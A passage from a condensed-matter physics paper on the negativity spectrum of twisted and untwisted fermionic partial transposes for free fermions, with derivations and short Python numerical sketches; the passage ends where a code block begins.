Unlike the entanglement spectrum which has been studied extensively, less is known about the spectrum of partially transposed density matrices in many-body systems. It is true that the PPT test which predates the entanglement spectrum is based on the eigenvalues of the PT, but the test only uses the sign of the eigenvalues. Therefore, studying the spectrum of the PT could be useful in characterizing quantum phases of matter. Furthermore, the fact that PT is applicable to extract entanglement at finite-temperature states and that the eigenvalues have a sign structure (positive/negative) may help unravel some new features beyond the entanglement spectrum. Recently, the distribution of eigenvalues of the PT, dubbed as \emph{the negativity spectrum}, was studied for CFTs in (1+1)d~\cite{Ruggiero_2}. It was found that the negativity spectrum is universal and depends only on the central charge of the CFT, similar to the entanglement spectrum, while the precise form of the spectrum depends on the sign of the eigenvalues. This dependence
is weak for bulk eigenvalues, whereas it is strong at the spectrum edges.
In this paper, we would like to study the negativity spectrum in fermionic systems.
The PT of fermionic density matrices however involves some subtleties due to the Fermi statistics (i.e., anti-commutation relation of fermion operators).
Initially, a procedure for the PT of fermions based on the fermion-boson mapping (Jordan-Wigner transformation) was proposed~\cite{Eisler2015} and was also used in the subsequent studies~\cite{Coser2015_1,Coser2016_1,Coser2016_2,PhysRevB.93.115148,PoYao2016,Herzog2016,Eisert2016}.
However, this definition turned out to cause certain inconsistencies within fermionic theories, such as violating the additivity property, missing some entanglement in topological superconductors, and giving rise to an incorrect classification of time-reversal symmetric topological insulators and superconductors.
Additionally, according to this definition it is computationally hard to find the PT (and calculate the entanglement negativity) even for free fermions, since the PT of a fermionic Gaussian state is not Gaussian.
This motivates us to use another way of implementing a fermionic PT which was proposed recently by some of us in the context of time-reversal symmetric SPT phases of fermions~\cite{Shap_unoriented,Shiozaki_antiunitary,Shap_pTR}.
This definition does not suffer from the above issues and at the same time the associated entanglement quantity is an entanglement monotone~\cite{Shap_sep}.
From a practical standpoint, the latter definition has the merit that the partially transposed Gaussian state remains Gaussian and hence can be computed efficiently for free fermions. A detailed survey of differences between the two definitions of PT from both perspectives of quantum information and condensed matter theory (specifically, topological phases of fermions) is discussed in Refs.~\cite{Shap_pTR,Shap_sep}.
Before we get into details of the fermionic PT in the coming sections, let us finish this part with a summary of our main findings.
We study the distribution of the many-body eigenvalues $\lambda_i$ of the partially transposed reduced density matrix,
\begin{align} \label{eq:dist}
P(\lambda)=\sum_i \delta(\lambda-\lambda_i)
\end{align}
for one-dimensional free fermions.
As a lattice realization, we consider the hopping Hamiltonian on a chain
\begin{align} \label{eq:Dirac_latt}
\hat{H}=- \sum_{j} [t ( f_{j+1}^\dag f_j + \text{H.c.}) +\mu f_j^\dag f_j ],
\end{align}
where the fermion operators $f_j$ and $f_j^\dag$ obey the anti-commutation relation $\{f_i,{f_j}^\dag\}=f_i{f_j}^\dag +{f_j}^\dag f_i=\delta_{ij}$ and $\{f_i,f_j\}=\{{f_i}^\dag,{f_j}^\dag\}=0$.
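Ground-state entanglement of the quadratic Hamiltonian \eqref{eq:Dirac_latt} is accessible through the two-point function alone. The sketch below (open boundaries, $\mu=0$, and the standard correlation-matrix method for Gaussian states; a cross-check of the critical logarithmic growth, not the negativity calculation of this paper) computes the entanglement entropy of an interval:

```python
import numpy as np

L, t, mu = 100, 1.0, 0.0
# Single-particle hopping matrix of the chain with open boundaries.
H1 = -t * (np.eye(L, k=1) + np.eye(L, k=-1)) - mu * np.eye(L)
eps, phi = np.linalg.eigh(H1)

# Ground state: fill all negative-energy modes (half filling for mu = 0).
occ = phi[:, eps < 0]
C = occ @ occ.conj().T          # correlation matrix C_ij = <f_i^dag f_j>

def interval_entropy(l):
    """Entropy of the first l sites from the eigenvalues of the
    correlation matrix restricted to the interval (Gaussian states)."""
    nu = np.linalg.eigvalsh(C[:l, :l])
    nu = nu[(nu > 1e-12) & (nu < 1 - 1e-12)]
    return -np.sum(nu * np.log(nu) + (1 - nu) * np.log(1 - nu))

# At criticality S(l) grows logarithmically with the interval length l.
S20, S40 = interval_entropy(20), interval_entropy(40)
assert S40 > S20 > 0
```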
Recall that using the regular (matrix) PT -- we will refer to it as the \emph{bosonic} PT --, which applies to generic systems where local operators commute, the obtained PT density matrix is a Hermitian operator and its eigenvalues are either negative or positive.
However, it turned out that for fermions a consistent definition of PT involves a phase factor as we exchange indices in (\ref{eq:rTb}) and in general one can define two types of PT operation.
As we will explain in detail, these two types correspond to the freedom of spacetime boundary condition for fermions associated with the fermion-number parity symmetry. We reserve ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$ to denote the fermionic PT which leads to anti-periodic (untwisted) and periodic (twisted) boundary conditions along fundamental cycles of the spacetime manifold, respectively.
We should note that ${\rho^{T_A}} $ is pseudo-Hermitian\footnote{A pseudo-Hermitian operator $H$ is defined by $\eta H^\dag \eta^{-1}=H$ with $\eta^2=1$ where $\eta$ is a unitary Hermitian operator satisfying $\eta^\dag\eta=\eta\eta^\dag=1$ and $\eta=\eta^\dag$. Essentially, pseudo-Hermiticity is a generalization of Hermiticity, in that it implies Hermiticity when $\eta=1$.} and may contain complex eigenvalues, while $\rho^{\widetilde{T}_A}$ is Hermitian and its eigenvalues are real. We use the spacetime path integral formulation to analytically calculate the negativity spectrum. In the case of $\rho^{\widetilde{T}_A}$, we obtain results very similar to those of previous CFT work~\cite{Ruggiero_2}, where the distribution of positive and negative eigenvalues are described by two universal functions.
In the case of ${\rho^{T_A}} $, we observe that the eigenvalues are complex but they have a pattern and fall on six branches in complex plane
with a \emph{quantized} complex phase of $\angle \lambda=2\pi n/6$. We show that the spectrum is reflection symmetric with respect to the real axis and the eigenvalue distributions are described by four universal functions along $\angle \lambda=0, \pm 2\pi/6, \pm 4\pi/6, \pi$ branches.
We further verify our findings by checking them against numerical lattice simulations.
The rest of our paper is organized as follows: in Section~\ref{sec:prelim} we provide a brief review of partial transpose for fermions, in Section~\ref{sec:spacetime} we discuss the spacetime path-integral formulation of the moments of partially transposed density matrices.
The spectrum of the {twisted} and {untwisted} partial transpose is analytically derived in Section~\ref{sec:negativity} for different geometries, where numerical checks with free fermions on the lattice are also provided.
We close our discussion by some concluding remarks in Section~\ref{sec:conclusions}.
In several appendices, we give further details of the analytical calculations
and make connections with other related concepts.
\section{Preliminary remarks}
\label{sec:prelim}
In this section, we review the basic material used in the following sections:
the definition of the PT for fermions, how to extract the distribution of the eigenvalues of an operator from its moments, and some properties of partially transposed Gaussian states.
\subsection{{Twisted} and {untwisted} partial transpose for fermions}
In this part, we briefly discuss some background materials on our definitions of PT for fermions. More details can be found in Refs.~\cite{Shap_pTR,Shap_sep}.
We consider a fermionic Fock space ${\cal H}$ generated by $N$ local fermionic modes $f_j$, $j=1,\cdots,N$.
The Hilbert space is spanned by $\ket{n_1,n_2,\cdots,n_N}$ which is a string of occupation numbers $n_j=0,1$. We define the Majorana (real) fermion operators in terms of canonical operators as
\begin{align}
c_{2j-1}:=f^{\dag}_j+f_j, \quad
c_{2j}:=i(f_j-f_j^{\dag}), \quad
j=1, \dots, N.
\label{eq:real_fermion}
\end{align}
These operators satisfy the anticommutation relation $\{c_j, c_k \} = 2 \delta_{jk}$ and generate a Clifford algebra. Any operator $X$ acting on $\mathcal{H}$ can be expressed as a polynomial in the $c_j$'s,
\begin{align}
X = \sum_{k=1}^{2N} \sum_{p_1<p_2 \cdots <p_k} X_{p_1 \cdots p_k} c_{p_1} \cdots c_{p_k},
\label{eq:op_expand}
\end{align}
where the coefficients $X_{p_1 \dots p_k}$ are complex numbers, fully antisymmetric under permutations of the indices. A density matrix obeys an extra constraint: it commutes with the total fermion-number parity operator, $[\rho,(-1)^F]=0$, where $F=\sum_j f_j^\dag f_j$. This constraint entails that the Majorana expansion of $\rho$ contains only terms with an even number of Majorana operators, i.e., $k$ in the above expression is even.
To study the entanglement, we consider a bipartite Hilbert space $\mathcal{H}_A\otimes \mathcal{H}_B$ spanned by
$f_j$ with $j=1,\cdots,N_A$ in subsystem $A$ and $j=N_A+1,\cdots,N_A+N_B$ in subsystem $B$.
Then, a generic density matrix on $\mathcal{H}_A\otimes \mathcal{H}_B$ can be expanded in Majorana operators as
\begin{align} \label{eq:density_bipartite}
\rho = \sum_{k_1,k_2}^{k_1+k_2 = {\rm even}} \rho_{p_1 \cdots p_{k_1}, q_1 \cdots q_{k_2}} a_{p_1} \cdots a_{p_{k_1}} b_{q_1} \cdots b_{q_{k_2}},
\end{align}
where
$\{ a_j \}$ and $\{ b_j \}$ are Majorana operators acting on $\mathcal{H}_A$
and $\mathcal{H}_B$, respectively,
and the even fermion-number parity condition is indicated by the condition $k_1+k_2 = {\rm even}$.
Our definition of the PT for fermions is given by~\cite{Shap_pTR,Shiozaki_antiunitary}
\begin{align}
{\rho^{T_A}} := \sum_{k_1,k_2}^{k_1+k_2 = {\rm even}} \rho_{p_1 \cdots p_{k_1}, q_1 \cdots q_{k_2}} i^{k_1} a_{p_1} \cdots a_{p_{k_1}} b_{q_1} \cdots b_{q_{k_2}},
\label{eq:fermion_pt}
\end{align}
and similarly for $\rho^{T_B}$. It is easy to see that successive application of the PT with respect to the two subsystems leads to the full transpose, $(\rho^{T_A})^{T_B}=\rho^{T}$, i.e.~it reverses the order of the Majorana fermion operators.
In addition, the definition (\ref{eq:fermion_pt}) implies that
\begin{align}
\label{eq:property1}
({\rho^{T_A}} )^\dag &=(-1)^{F_A} {\rho^{T_A}} (-1)^{F_A},\\
\label{eq:property2}
({\rho^{T_A}} )^{ T_A} &=(-1)^{F_A} \rho (-1)^{F_A},
\end{align}
where $(-1)^{F_A}$ is the fermion-number parity operator on $\mathcal{H}_A$, i.e.~$F_A=\sum_{j\in A} f_j^\dag f_j$.
The first identity, namely the pseudo-Hermiticity, follows from the fact that $({\rho^{T_A}} )^\dag$ is given by the same expansion as (\ref{eq:fermion_pt}) with $i^{k_1}$ replaced by $(-i)^{k_1}$.
The second identity reflects the fact that the fermionic PT is related to the action of time-reversal operator of spinless fermions in the Euclidean spacetime~\cite{Shiozaki_antiunitary}.
We should note that the matrix resulting from the PT is not necessarily Hermitian and may have complex eigenvalues, although $\text{Tr}{\rho^{T_A}} =1$. The existence of complex eigenvalues is a crucial property: it was used in the context of SPT invariants to show that the complex phase of $\text{Tr}(\rho{\rho^{T_A}} )$, which represents a partition function on a non-orientable spacetime manifold, is a topological invariant. For instance, $\text{Tr}(\rho{\rho^{T_A}} )=e^{i2\pi \nu/8}$ for time-reversal symmetric topological superconductors (class BDI), which implies the $\mathbb{Z}_8$ classification (here, $\nu \in \mathbb{Z}_8$ is the topological invariant).
Nevertheless, we may still use Eq.~(\ref{eq:neg_def}) to define an analog of the entanglement negativity for fermions and calculate the trace norm in terms of the square roots of the eigenvalues of the composite operator $\rho_\times=({\rho^{T_A}} )^\dag {\rho^{T_A}} $, which is a Hermitian operator with real non-negative eigenvalues.
On the other hand, from Eq.~(\ref{eq:property1}) we realize that $\rho_\times= (\rho^{\widetilde{T}_A})^2$ where we introduce the \emph{twisted} PT by
\begin{align}
\rho^{\widetilde{T}_A} :={\rho^{T_A}} (-1)^{F_A}.
\end{align}
It is easy to see from Eq.~(\ref{eq:property1}) that this operator is Hermitian and thus, similar to the bosonic PT, always has real eigenvalues. It is worth noting that
\begin{align} \label{eq:property_t}
(\rho^{\widetilde{T}_A})^{\widetilde{T}_A}=\rho,
\end{align}
in contrast with the \emph{untwisted} PT (\ref{eq:property2}). As we will see shortly, this difference between ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$ in the operator formalism will show up as anti-periodic and periodic boundary conditions across the fundamental cycles of spacetime manifold in the path-integral formalism. The central result of our paper is to report analytical results for the spectrum of ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$.
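These properties can be verified explicitly on a toy system. The following Python sketch (our own minimal illustration for $N=2$ modes in a Jordan--Wigner representation, not the numerical method used later in the paper) implements the definition (\ref{eq:fermion_pt}) by expanding a random parity-even density matrix in ordered Majorana monomials, and checks the pseudo-Hermiticity (\ref{eq:property1}), the Hermiticity of $\rho^{\widetilde{T}_A}$, and the reality of the moments:

```python
import numpy as np
from itertools import combinations

# Jordan-Wigner representation of the Majorana operators (eq. for c_{2j-1}, c_{2j})
# for N = 2 modes: mode 1 = subsystem A, mode 2 = subsystem B.
X = np.array([[0, 1], [1, 0]], dtype=complex)
Y = np.array([[0, -1j], [1j, 0]])
Z = np.diag([1.0 + 0j, -1.0])
I2 = np.eye(2)
c = [np.kron(X, I2), np.kron(Y, I2), np.kron(Z, X), np.kron(Z, Y)]  # c_1..c_4

# Random parity-even density matrix: symmetrize a PSD matrix with (-1)^F.
rng = np.random.default_rng(0)
M = rng.normal(size=(4, 4)) + 1j * rng.normal(size=(4, 4))
M = M @ M.conj().T
P = np.kron(Z, Z)                       # (-1)^F up to a sign
rho = M + P @ M @ P
rho /= np.trace(rho)

# Partial transpose on A: expand rho in ordered Majorana monomials (an
# orthogonal basis under Tr[M M'^dag]/4) and weight each term by i^{k_1}.
rho_TA = np.zeros((4, 4), dtype=complex)
for k in range(5):
    for idx in combinations(range(4), k):
        mono = np.eye(4, dtype=complex)
        for p in idx:
            mono = mono @ c[p]
        coeff = np.trace(rho @ mono.conj().T) / 4.0
        k1 = sum(1 for p in idx if p < 2)    # Majoranas c_1, c_2 belong to A
        rho_TA = rho_TA + coeff * (1j) ** k1 * mono

PA = np.kron(Z, I2)                     # (-1)^{F_A}
rho_TAt = rho_TA @ PA                   # twisted partial transpose
```

The trace is preserved, $({\rho^{T_A}})^\dag=(-1)^{F_A}{\rho^{T_A}}(-1)^{F_A}$ holds, $\rho^{\widetilde{T}_A}$ comes out Hermitian, and $\text{Tr}[({\rho^{T_A}})^2]$ is real, as expected from the conjugate-pair structure of the spectrum.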
\subsection{The moment problem}
In the replica approach to the logarithmic negativity (\ref{eq:neg_def}) and the negativity spectrum, one first has to calculate the moments of the PT, also known as R\'enyi negativities (RN),
\begin{align}
{\cal N}_n^{({\rm ns})} (\rho)=\ln \text{Tr} [({\rho^{T_A}} )^n], \qquad {\cal N}_n^{({\rm r})} (\rho)=\ln \text{Tr} [(\rho^{\widetilde{T}_A})^n],
\end{align}
which are the fermionic counterparts of the bosonic definition in Eq.~(\ref{eq:pathTR_b}). The superscripts $(\textrm{ns})$ and $(\textrm{r})$ stand for Neveu-Schwarz and Ramond, respectively (the reason for this terminology will become clear from the path-integral representation of these quantities; see Section~\ref{sec:spacetime} below).
Thus, the analog of analytic continuation (\ref{eq:anal_cont_b}) to obtain the logarithmic negativity is
\begin{align} \label{eq:anal_cont_f}
{\cal E}(\rho)= \lim_{n\to 1/2} {\cal N}_{2n}^{({\rm r})}.
\end{align}
In the following, we review a general framework to analytically obtain the distribution of the eigenvalues of a density matrix (or its partial transpose) from its moments.
This method was originally used to derive the entanglement spectrum of (1+1)d CFTs~\cite{Lefevre2008}.
Suppose we have an operator ${\cal O}$ whose moments are of the form
\begin{align} \label{eq:Rmoment}
R_n := \text{Tr}[{\cal O}^n].
\end{align}
In terms of the eigenvalues of ${\cal O}$, $\{ \lambda_j \}$, we have $R_n=\sum_j \lambda_j^n = \int P(\lambda) \lambda^n d\lambda$, where $P(\lambda)$ is the associated distribution function (see Eq.~(\ref{eq:dist})). The goal is to find $P(\lambda)$ by making use of the specific form of $R_n$ in (\ref{eq:Rmoment}).
The essential idea is to compute the Stieltjes transform
\begin{equation} \label{eq:Stjilties}
f (s) := \frac{1}{\pi} \sum_{n=1}^{\infty} R_n s^{-n}= \frac{1}{\pi} \int d\lambda \frac{\lambda P(\lambda)}{s-\lambda}.
\end{equation}
Assuming that the eigenvalues are real, the distribution function can be easily read off from the relation
\begin{equation} \label{eq:prob_s}
P (\lambda) = \frac{1}{\lambda} \lim_{\epsilon \to 0} \text{Im} f (\lambda- i \epsilon).
\end{equation}
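As a toy numerical illustration of this inversion (with an arbitrary made-up spectrum, unrelated to any model in this paper), one can evaluate the resummed Stieltjes transform slightly below the real axis; the smeared density then integrates to the number of eigenvalues:

```python
import numpy as np

# Toy spectrum of a Hermitian operator; P(lambda) is a sum of delta peaks.
lams = np.array([0.6, 0.3, 0.1])
eps = 1e-4                                  # distance below the real axis
grid = np.linspace(0.01, 1.0, 400_001)

# f(s) = (1/pi) sum_j lam_j / (s - lam_j): the geometric series resummed.
f = (lams[None, :] / (grid[:, None] - lams[None, :] - 1j * eps)).sum(axis=1) / np.pi
P_eps = np.imag(f) / grid                   # finite-eps version of P(lambda)

# Riemann sum: approaches the eigenvalue count (here 3) as eps -> 0.
total_weight = P_eps.sum() * (grid[1] - grid[0])
```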
In the following, we focus on the complementary cumulative distribution function, or simply the tail distribution, which is a particularly simple object to access numerically,
\begin{align}
n(\lambda)=\int_\lambda^{\lambda_\text{max}} d\lambda P(\lambda).
\end{align}
For specific types of operators such as the density matrices and their PT in (1+1)d CFTs, the moments can be cast in the form,
\begin{align} \label{eq:Rn_cft}
R_n= r_n \exp \left(- b n + \frac{a}{n} \right), \qquad \forall n,
\end{align}
where $a, b\in \mathbb{R}$ with $b>0$, and the $r_n$ are non-universal constants.
In such cases, the distribution function is found to be \cite{Ruggiero_1}
\begin{align}
\label{eq:Pdist}
P (\lambda; a, b) &=\left\{
\begin{array}{ll}
\frac{a \, \theta (e^{-b} - \lambda)}{\lambda \sqrt{a \ln (e^{-b}/\lambda)}} I_1 (2 \sqrt{a \ln (e^{-b}/\lambda)})
+ \delta(e^{-b}- \lambda), & a>0,\\
\frac{- |a| \, \theta (e^{-b} - \lambda)}{\lambda \sqrt{|a| \ln (e^{-b}/\lambda)}} J_1 (2 \sqrt{|a| \ln (e^{-b}/\lambda)}) + \delta(e^{-b}- \lambda) , & a<0,
\end{array}
\right.
\end{align}
and the corresponding tail distribution is given by
\begin{align}
\label{eq:Tdist}
n (\lambda; a, b) &=\left\{
\begin{array}{ll}
I_0 (2 \sqrt{a \ln (e^{-b}/\lambda)}) , & a>0,\\
J_0 (2 \sqrt{|a| \ln (e^{-b}/\lambda)}), & a<0,
\end{array}
\right.
\end{align}
where $J_\alpha(x)$ and $I_\alpha(x)$ are the regular Bessel functions and modified Bessel functions of the first kind, respectively.
Note that \eqref{eq:Pdist} and \eqref{eq:Tdist} are derived by ignoring the presence of the constants $r_n$ in \eqref{eq:Rn_cft}. This relies on the assumption that they do not change significantly upon varying $n$, i.e.,
$\lim_{n\to \infty} \frac{1}{n}\ln r_n<\infty$.
The very same assumption has been adopted for the entanglement and bosonic negativity spectrum in Refs.~\cite{Lefevre2008} and \cite{Ruggiero_2} where the derived distribution functions agree with the numerically obtained spectra.
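For later numerical comparisons it is convenient to have the universal functions (\ref{eq:Tdist}) in code; the sketch below (the function name is ours, and \texttt{scipy} is assumed to be available) also makes the normalization $n(\lambda_{\max})=I_0(0)=J_0(0)=1$ at $\lambda_{\max}=e^{-b}$ explicit:

```python
import numpy as np
from scipy.special import i0, j0

def tail_distribution(lam, a, b):
    """Tail distribution n(lambda; a, b), valid for 0 < lambda <= e^{-b}."""
    x = np.log(np.exp(-b) / lam)            # ln(e^{-b}/lambda) >= 0
    return i0(2 * np.sqrt(a * x)) if a > 0 else j0(2 * np.sqrt(-a * x))
```

For $a>0$ the tail grows monotonically as $\lambda$ decreases (modified Bessel $I_0$), while for $a<0$ it oscillates ($J_0$).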
\subsection{Partial transpose of Gaussian states}
Here, we discuss how to compute the spectrum of the PT of a Gaussian state from the corresponding covariance matrix.
The idea is similar to that used for the entanglement spectrum, with the difference that the covariance matrix associated with the partially transposed density matrix may have complex eigenvalues. Before we continue, let us summarize the structure of the many-body spectrum of ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$ for free fermions,
\begin{align}
\text{Spec}[{\rho^{T_A}} ]&: \left\{
\begin{array}{lll}
(\lambda_i,\lambda_i^\ast) & \text{Im}[\lambda_i] \neq 0, &\\
(\lambda_i,\lambda_i) & \text{Im}[\lambda_i] = 0, & \lambda_i<0, \\
\lambda_i & \text{Im}[\lambda_i] = 0, & \lambda_i>0, \\
\end{array}
\right.\\
\text{Spec}[\rho^{\widetilde{T}_A}]&:
\left\{
\begin{array}{ll}
(\lambda_i, \lambda_i) & \lambda_i<0,\\
\lambda_i & \lambda_i>0,\\
\end{array}
\right.
\end{align}
where repeated values indicate a twofold degeneracy.
We should note that the pseudo-Hermiticity of ${\rho^{T_A}} $ (\ref{eq:property1}) ensures that the complex-valued subset of many-body eigenvalues of ${\rho^{T_A}} $ appear in complex conjugate pairs. This property is general and applicable to any density matrix beyond free fermions. An immediate consequence of this property is that any moment of ${\rho^{T_A}} $ is guaranteed to be real-valued.
A Gaussian density matrix in the Majorana fermion basis (\ref{eq:real_fermion}) is defined by
\begin{align} \label{eq:rho_w}
\rho_\Omega= \frac{1}{{\cal Z}(\Omega)} \exp\left(\frac{1}{4} \sum_{j,k=1}^{2N} \Omega_{jk} c_j c_k \right),
\end{align}
where $\Omega$ is a pure imaginary antisymmetric matrix and
${\cal Z}(\Omega)=\pm \sqrt{\det \left( 2\cosh\frac{\Omega}{2}\right)}$
is the normalization constant. We should note that the spectrum of $\Omega$ comes in pairs $\pm \omega_j,\ j=1,\dots,N$; the $\pm$ sign ambiguity in ${\cal Z}(\Omega)$ stems from the square root of the determinant, where one eigenvalue must be chosen from every pair $\pm \omega_j$, and the sign is fixed by the Pfaffian.
This density matrix can be uniquely characterized by its covariance matrix,
\begin{align}
\Gamma_{jk}=\frac{1}{2}\text{Tr}(\rho_\Omega [c_j,c_k]),
\end{align}
which is a $2N\times 2N$ matrix.
These two matrices are related by
\begin{align} \label{eq:Gamma_Omega}
\Gamma= \tanh\left(\frac{\Omega}{2} \right), \qquad e^\Omega=\frac{\mathbb{I}+\Gamma}{\mathbb{I}-\Gamma}.
\end{align}
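The two relations in (\ref{eq:Gamma_Omega}) can be cross-checked numerically for a random Gaussian exponent (a consistency sketch only, assuming \texttt{scipy.linalg} for the matrix functions):

```python
import numpy as np
from scipy.linalg import expm, tanhm

rng = np.random.default_rng(1)
K = rng.normal(size=(6, 6))
Omega = 1j * (K - K.T)     # purely imaginary and antisymmetric, hence Hermitian

Gamma = tanhm(Omega / 2)   # covariance matrix from the Gaussian exponent
lhs = expm(Omega)
rhs = (np.eye(6) + Gamma) @ np.linalg.inv(np.eye(6) - Gamma)
```

Since $\Omega$ is Hermitian, the eigenvalues of $\Gamma=\tanh(\Omega/2)$ lie in $(-1,1)$, so $\mathbb{I}-\Gamma$ is always invertible.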
Furthermore, one can consider a generic Gaussian operator, also defined through Eq.~(\ref{eq:rho_w}) but without requiring $\Omega$ to be pure imaginary. An equivalent description in terms of the covariance matrix applies to such operators as well; the only difference is that the eigenvalues need not be real.
Let us recall how R\'enyi entropies (\ref{eq:Rn_def}) are computed for Gaussian states.
The density matrix (\ref{eq:rho_w}) can be brought into a diagonal form $\rho_\Omega = {\cal Z}^{-1} \exp\left(\frac{i}{2} \sum_{n} \omega_n d_{2n} d_{2n-1} \right)$,
where $\omega_n$ is obtained from an orthogonal transformation of $\Omega$.
In terms of the eigenvalues of $\Gamma$, denoted by $\pm \nu_j$, we have
$\rho_\Omega = \prod_n (1+ i \nu_n d_{2n} d_{2n-1} )/2$,
leading to
\begin{align}
{\cal R}_n(\rho)=\frac{1}{1-n} \sum_{j=1}^N \ln \left[ \left(\frac{1-\nu_j}{2}\right)^n+\left(\frac{1+\nu_j}{2}\right)^n \right].
\end{align}
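In code, this formula is a one-liner (a minimal helper with our own naming, taking the positive eigenvalues $\nu_j$ of $\Gamma$):

```python
import numpy as np

def renyi_entropy(nu, n):
    """Renyi entropy R_n from the eigenvalue pairs +/- nu_j of Gamma."""
    nu = np.asarray(nu, dtype=float)
    return np.log(((1 - nu) / 2) ** n + ((1 + nu) / 2) ** n).sum() / (1 - n)
```

For a pure Gaussian state all $\nu_j=1$ and ${\cal R}_n=0$, while a maximally mixed mode with $\nu_j=0$ contributes $\ln 2$ for any $n$.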
We consider a density matrix on a bipartite Hilbert space (\ref{eq:density_bipartite}) where the covariance matrix takes a block matrix form as
\begin{align}
\Gamma = \left( \begin{array}{cc}
\Gamma_{AA} & \Gamma_{AB} \\
\Gamma_{BA} & \Gamma_{BB}
\end{array} \right).
\end{align}
Here, $\Gamma_{AA}$ and $\Gamma_{BB}$ denote the reduced covariance matrices of subsystems
$A$ and $B$, respectively; while $\Gamma_{AB}=\Gamma_{BA}^\dag$ describes the correlations between them. We define the covariance matrix associated with a partially transposed Gaussian state by
\begin{align} \label{eq:gamma_pt}
\Gamma_{\pm} = \left( \begin{array}{cc}
-\Gamma_{AA} & \pm i \Gamma_{AB} \\
\pm i \Gamma_{BA} & \Gamma_{BB}
\end{array} \right),
\end{align}
where $[\Gamma_+]_{ij}=\frac{1}{2}\text{Tr}({\rho^{T_A}} [c_i,c_j])$ and $[\Gamma_-]_{ij}=\frac{1}{2}\text{Tr}({\rho^{T_A}} ^\dag [c_i,c_j])$.
We should note that $\Gamma_+$ and $\Gamma_-$ have identical eigenvalues, although they do not necessarily commute, $[\Gamma_+,\Gamma_-]\neq0$.
In general, the eigenvalues of $\Gamma_+$ appear in quartets $(\pm \nu_k, \pm \nu_k^\ast)$ when $\text{Re}[\nu_k]\neq 0$ and $\text{Im}[\nu_k]\neq 0$, or in doublets $\pm \nu_k$ when $\nu_k$ is pure imaginary ($\text{Re}[\nu_k]= 0$) or real ($\text{Im}[\nu_k]= 0$). The pairing $\pm\nu_k$ is a consequence of the skew symmetry $\Gamma^T_\pm=-\Gamma_\pm$.
In addition, the pseudo-Hermiticity of ${\rho^{T_A}} $ (\ref{eq:property1}) implies that
\begin{align} \label{eq:pseudo_gam}
\Gamma_\pm^\dag=U_1 \Gamma_\pm U_1,
\end{align}
where $U_1=(-\mathbb{I}_A \oplus \mathbb{I}_B )$ is the matrix associated with the operator $(-1)^{F_A}$. This means
that for every eigenvalue $\nu_k$ its complex conjugate $\nu_k^\ast$ is also an eigenvalue.
As a result, the moments of PT can be written as
\begin{align}
{\cal N}_n^{({\rm ns})}= \sum_{j=1}^{N} \ln \left| \left(\frac{1-\nu_j}{2}\right)^n+\left(\frac{1+\nu_j}{2}\right)^n \right|.
\end{align}
Note that the sum now runs over half of the eigenvalues (say, those in the upper half of the complex plane), due to the structure discussed above.
For $\rho^{\widetilde{T}_A}$ we use the multiplication rule for the Gaussian operators where the resulting Gaussian matrix is given by
\begin{align} \label{eq:Omega_Td}
e^{\widetilde{\Omega}_\pm}= \frac{\mathbb{I}+\Gamma_\pm}{\mathbb{I}-\Gamma_\pm} U_1,
\end{align}
which is manifestly Hermitian due to the identity (\ref{eq:pseudo_gam}). Using Eq.~(\ref{eq:rho_w}), the normalization factor is found to be
${\cal Z}_{\widetilde{T}_A}= \text{Tr}(\rho^{\widetilde{T}_A})=\text{Tr}[\rho (-1)^{F_A}]=\sqrt{\det\Gamma_{AA}}$.
From (\ref{eq:Gamma_Omega}) we construct the covariance matrix $\widetilde{\Gamma}_\pm=\tanh(\widetilde{\Omega}_\pm/2)$ and compute the moments of $\rho^{\widetilde{T}_A}$ by
\begin{align}
{\cal N}_n^{({\rm r})}= \sum_{j=1}^{N} \ln \left| \left(\frac{1-\tilde\nu_j}{2}\right)^n+\left(\frac{1+\tilde\nu_j}{2}\right)^n \right| + n\ln {\cal Z}_{\widetilde{T}_A},
\end{align}
where $\pm \tilde\nu_j$ are eigenvalues of $\widetilde{\Gamma}_\pm$ which are guaranteed to be real.
Consequently, the logarithmic negativity (\ref{eq:anal_cont_f}) is given by
\begin{align}
{\cal E}= \sum_{j=1}^{N} \ln \left[ \left|\frac{1-\tilde\nu_j}{2}\right| +\left|\frac{1+\tilde\nu_j}{2}\right| \right] + \ln {\cal Z}_{\widetilde{T}_A}.
\end{align}
For particle-number conserving systems, such as the lattice model in (\ref{eq:Dirac_latt}), the covariance matrix simplifies to $\Gamma=\sigma_2 \otimes \gamma$, where $\gamma=\mathbb{I}-2C$, $C_{ij}=\text{Tr}(\rho f_i^\dag f_j)$ is the correlation matrix, and $\sigma_2$ is the second Pauli matrix acting on the even/odd indices of the Majorana operators $(c_{2j},c_{2j-1})$.
In this case, the transformed correlation matrix for ${\rho^{T_A}} $ is given by
\begin{align} \label{eq:metal_pt}
\gamma_{\pm} = \left( \begin{array}{cc}
-\gamma_{AA} & \pm i \gamma_{AB} \\
\pm i \gamma_{BA} & \gamma_{BB}
\end{array} \right).
\end{align}
The eigenvalues can be divided into two categories: complex eigenvalues $\nu_k$ with $\text{Im}[\nu_k]\neq 0$, and real eigenvalues $u_k$ with $\text{Im}[u_k]= 0$.
The pseudo-Hermiticity property leads to the identity $\gamma_{\pm}^\dag= U_1 \gamma_\pm U_1$ which implies that complex eigenvalues appear in pairs $(\nu_k,\nu_k^\ast)$. Therefore, the many-body eigenvalues follow the form,
\begin{align} \label{eq:mb_eigs}
\lambda_{\boldsymbol{\sigma},\boldsymbol{\sigma'}}
&=
\prod_{\sigma_l}
\frac{1+\sigma_l u_l}{2}
\prod_{\sigma_k=\sigma_k'}
\frac{1+|\nu_k|^2 + 2\sigma_k \text{Re} [\nu_k]}{4}
\prod_{\sigma_k=-\sigma_k'} \frac{1-|\nu_k|^2 + 2 \sigma_k i \text{Im} [\nu_k]}{4},
\end{align}
where $\boldsymbol{\sigma}=\{ \sigma_k=\pm \}$ is a string of signs. Clearly, the many-body eigenvalues also fall into two categories: complex conjugate pairs $(\lambda_j,\lambda_j^\ast)$ and real eigenvalues, which are not necessarily degenerate.
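The structure above is straightforward to confirm on the lattice. The sketch below uses the ground state of a half-filled open tight-binding chain as an illustrative free-fermion state (a model choice of ours, not necessarily the Hamiltonian (\ref{eq:Dirac_latt})), builds $\gamma_+$ from Eq.~(\ref{eq:metal_pt}), and checks the pseudo-Hermiticity identity $\gamma_+^\dag=U_1\gamma_+ U_1$, which forces the characteristic polynomial -- and hence the spectrum -- to be closed under complex conjugation:

```python
import numpy as np

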